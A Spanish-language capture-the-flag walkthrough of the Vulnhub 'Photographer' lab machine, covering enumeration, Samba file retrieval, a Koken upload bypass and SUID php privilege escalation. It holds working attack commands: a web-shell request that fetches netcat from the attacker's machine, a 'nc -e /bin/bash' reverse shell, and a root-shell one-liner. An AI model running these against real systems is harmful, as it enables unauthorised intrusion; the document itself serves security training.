[Vulnhub] - Photographer

Hoy vamos a hackear la maquina de Vulnhub llamada Photographer. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/photographer-1,519/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.80 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 03:04 CEST Nmap scan report for photographer.home (192.168.1.80) Host is up (0.00035s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Photographer by v1n1v131r4 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Koken 0.22.24 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: daisa ahomi Service Info: Host: PHOTOGRAPHER Host script results: |_clock-skew: mean: 21h20m17s, deviation: 2h18m34s, median: 20h00m17s |_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: photographer | NetBIOS computer name: PHOTOGRAPHER\x00 | Domain name: \x00 | FQDN: photographer |_ System time: 2020-07-27T17:04:34-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-27T21:04:33 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
    Tras mirar los servicios abiertos, empezamos mirando el Samba. Echamos un vistazo a ver si esta compartiendo alguna carpeta.
    ~ > smbclient -L 192.168.1.80 Enter WORKGROUP\sml's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers sambashare Disk Samba on Ubuntu IPC$ IPC IPC Service (photographer server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
    Nos conectamos a la carpeta sambashare.
    ~ > smbclient \\\\192.168.1.80\\sambashare Enter WORKGROUP\sml's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Tue Jul 21 03:30:07 2020 .. D 0 Tue Jul 21 11:44:25 2020 mailsent.txt N 503 Tue Jul 21 03:29:40 2020 wordpress.bkp.zip N 13930308 Tue Jul 21 03:22:23 2020 278627392 blocks of size 1024. 264268400 blocks available
    Vemos que tiene un par de ficheros. Nos descargamos el mailsent.txt
    smb: \> get mailsent.txt getting file \mailsent.txt of size 503 as mailsent.txt (163,7 KiloBytes/sec) (average 163,7 KiloBytes/sec)
    Vemos su contenido.
    ~ > cat mailsent.txt Message-ID: <4129F3CA.2020509@dc.edu> Date: Mon, 20 Jul 2020 11:40:36 -0400 From: Agi Clarence User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Daisa Ahomi Subject: To Do - Daisa Website's Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi Daisa! Your site is ready now. Don't forget your secret, my babygirl ;)
    Del texto que aparece, podemos sacar un posible login "daisa", las direcciones de correo daisa@photographer.com y por ultimo el "babygirl" que tiene toda la pinta de ser un password :) Seguimos explorando los servicios, en este caso el puerto 8000.
    ~ > dirb http://192.168.1.80:8000 /usr/share/wordlists/dirb/big.txt -f ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Jul 27 03:10:10 2020 URL_BASE: http://192.168.1.80:8000/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt OPTION: Fine tunning of NOT_FOUND detection ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://192.168.1.80:8000/ ---- + http://192.168.1.79:8000/.bash_history (CODE:302|SIZE:0) + http://192.168.1.79:8000/.bashrc (CODE:302|SIZE:0) + http://192.168.1.79:8000/.cvs (CODE:302|SIZE:0) + http://192.168.1.79:8000/.cvsignore (CODE:302|SIZE:0) + http://192.168.1.79:8000/.forward (CODE:302|SIZE:0) + http://192.168.1.79:8000/access_log.1 (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.1.80:8000/admin/ ==> DIRECTORY: http://192.168.1.80:8000/app/ + http://192.168.1.80:8000/asdfjkl; (CODE:301|SIZE:0) + http://192.168.1.80:8000/cgi-bin/ (CODE:302|SIZE:0) ---SNIP---
    Vemos que hay una carpeta "admin". Al conectarnos a http://192.168.1.80:8000/admin/ nos pide credenciales. Usaremos: daisa@photographer.com/babygirl Ya estamos dentro :) Buscamos su hay algun exploit para Koken y encontramos el siguiente[1]. Hay que crear un fichero x.php.jpg, hacer el upload e intercerptarlo con burp para modificar el nombre del fichero para quitarle la extension .jpg. Empezamos por crear el fichero.
    ~ > nano image.php.jpg
    Ejecutamos burp para interceptar la request cuando hagamos el upload. En el dashboard de Koken, hacemos Import content y seleccionamos el fichero que acabamos de crear. Interceptamos la request, y quitamos el .jpg del nombre. Una vez enviada la peticion modificada, quitamos el Burp, nos ponemos encima de "Download" file en el dashboard de Koken para ver donde esta el fichero subido. Podemos ver que esta en la siguiente url: http://192.168.1.80:8000/storage/originals/09/0e/image.php Usando el parametro "cmd", nos decargaremos desde nuestra maquina el nc, le daremos permisos de ejecucion, y lanzaremos una reverse shell. Ponemos nc a la escucha:
    ~ > nc -nlvp 5555
    Y usamos el parametro "cmd" para obtener la reverse shell usando el nc que nos descargamos de nuestra maquina.
    http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd=wget http://192.168.1.111/nc -O /tmp/nc http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd= chmod 777 /tmp/nc http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd /tmp/nc -e /bin/bash 192.168.1.111 5555
  • Low Shell
  • ~ > nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.111] from (UNKNOWN) [192.168.1.79] 55916 python -c 'import pty;pty.spawn("/bin/bash")' www-data@photographer:/var/www/html/koken/storage/originals/71/5c$
  • user.txt
  • Miramos si vemos algo interesante.
    www-data@photographer:/home$ ls agi daisa lost+found www-data@photographer:/home$ cd daisa www-data@photographer:/home/daisa$ cat user.txt d41d8cd98f00b204e9800998ecf8427e
    Exploramos el sistema para ver si encontramos algo que nos ayude a escalar privilegios.
  • Privilege Escalation
  • www-data@photographer:/tmp$ find / -perm -4000 2>/dev/null ---SNIP--- /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox /usr/lib/policykit-1/polkit-agent-helper-1 /usr/sbin/pppd /usr/bin/pkexec /usr/bin/passwd /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/php7.2 ---SNIP---
    Vemos que /usr/bin/php7.2 tiene el SUID activado. Lo utilizamos para escalar privilegios :)
    www-data@photographer:/tmp$ export CMD="/bin/sh" www-data@photographer:/tmp$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);" # id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
  • proof.txt
  • # cd /root # ls proof.txt # cat proof.txt .:/://::::///:-` -/++:+`:--:o: oo.-/+/:` -++-.`o++s-y:/s: `sh:hy`:-/+:` :o:``oyo/o`. ` ```/-so:+--+/` -o:-`yh//. `./ys/-.o/ ++.-ys/:/y- /s-:/+/:/o` o/ :yo-:hNN .MNs./+o--s` ++ soh-/mMMN--.` `.-/MMMd-o:+ -s .y /++:NMMMy-.`` ``-:hMMMmoss: +/ s- hMMMN` shyo+:. -/+syd+ :MMMMo h h `MMMMMy./MMMMMd: +mMMMMN--dMMMMd s. y `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm +- h dMMMMd:```` `mmNh ```./NMMMMs o. y. /MMMMNmmmmd/ `s-:o sdmmmmMMMMN. h` :o sMMMMMMMMs. -hMMMMMMMM/ :o s: `sMMMMMMMo - . `. . hMMMMMMN+ `y` `s- +mMMMMMNhd+h/+h+dhMMMMMMd: `s- `s: --.sNMMMMMMMMMMMMMMMMMMmo/. -s. /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o` .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o- ./+:`:yh:dso/.+-++++ss+h++.:++- -/+/-:-/y+/d:yh-o:+--/+/:` `-///////////////:` Follow me at: http://v1n1v131r4.com d41d8cd98f00b204e9800998ecf8427e
  • End
  • Y con esto ya seriamos root de la maquina [1] https://www.exploit-db.com/exploits/48706